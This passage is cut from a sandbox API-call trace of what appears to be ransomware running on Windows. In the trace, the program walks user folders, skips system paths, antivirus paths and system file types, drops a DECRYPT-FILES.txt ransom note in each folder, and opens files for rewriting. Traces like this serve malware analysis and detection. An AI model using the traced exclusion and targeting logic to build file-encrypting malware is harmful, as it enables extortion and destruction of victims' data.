returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\All Users") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="AhnLab") returned 0x0 [0076.904] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.904] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 76 [0076.905] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.905] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\jkbimi8.tmp") returned 88 [0076.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0076.905] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 76 [0076.906] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.906] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\DECRYPT-FILES.txt") returned 94 [0076.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0076.906] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0076.907] CloseHandle (hObject=0x454) returned 1 [0076.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 76 [0076.907] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0076.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0076.907] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.907] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.907] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.907] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.907] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="D5NTRC6R", cAlternateFileName="")) returned 1 [0076.907] lstrcmpW (lpString1="D5NTRC6R", lpString2=".") returned 1 [0076.907] lstrcmpW (lpString1="D5NTRC6R", lpString2="..") returned 1 [0076.908] lstrcatW (in: lpString1="D5NTRC6R", lpString2="\\" | out: lpString1="D5NTRC6R\\") returned="D5NTRC6R\\" [0076.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="D5NTRC6R\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\" [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Program Files") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch=":\\Windows") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Games\\") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\All Users") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="AhnLab") returned 0x0 [0076.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.908] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned 85 [0076.908] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.908] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\\\jkbimi8.tmp") returned 97 [0076.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\d5ntrc6r\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0076.909] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned 85 [0076.909] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.909] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\\\DECRYPT-FILES.txt") returned 103 [0076.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\d5ntrc6r\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0076.910] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0076.911] CloseHandle (hObject=0x45c) returned 1 [0076.911] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned 85 [0076.911] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*" [0076.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0076.911] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.911] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.911] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.911] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.911] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.911] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.911] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.911] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.911] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.911] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.911] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.911] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.912] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.912] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.912] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.912] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.912] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.912] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.912] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.912] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.912] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.912] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.912] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned 85 [0076.912] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.912] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\" [0076.912] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\jkbimi8.tmp" [0076.912] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\d5ntrc6r\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.912] CloseHandle (hObject=0x0) returned 0 [0076.912] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.913] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.913] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0076.913] CloseHandle (hObject=0x458) returned 1 [0076.913] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.913] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.913] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.913] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.913] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.913] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.913] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.913] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.913] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.913] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 76 [0076.913] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.913] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" [0076.913] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\jkbimi8.tmp" [0076.913] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.914] CloseHandle (hObject=0x0) returned 0 [0076.914] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.914] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0c6680, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0c6680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0c6680, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.914] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0076.914] CloseHandle (hObject=0x450) returned 1 [0076.914] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0a0520, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0a0520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0a0520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.914] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.914] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0a0520, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0a0520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0a0520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.914] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.915] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.915] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.915] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.915] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.915] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.915] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.915] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.915] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.915] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.915] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.915] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.915] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.915] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.915] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 65 [0076.915] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.915] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS 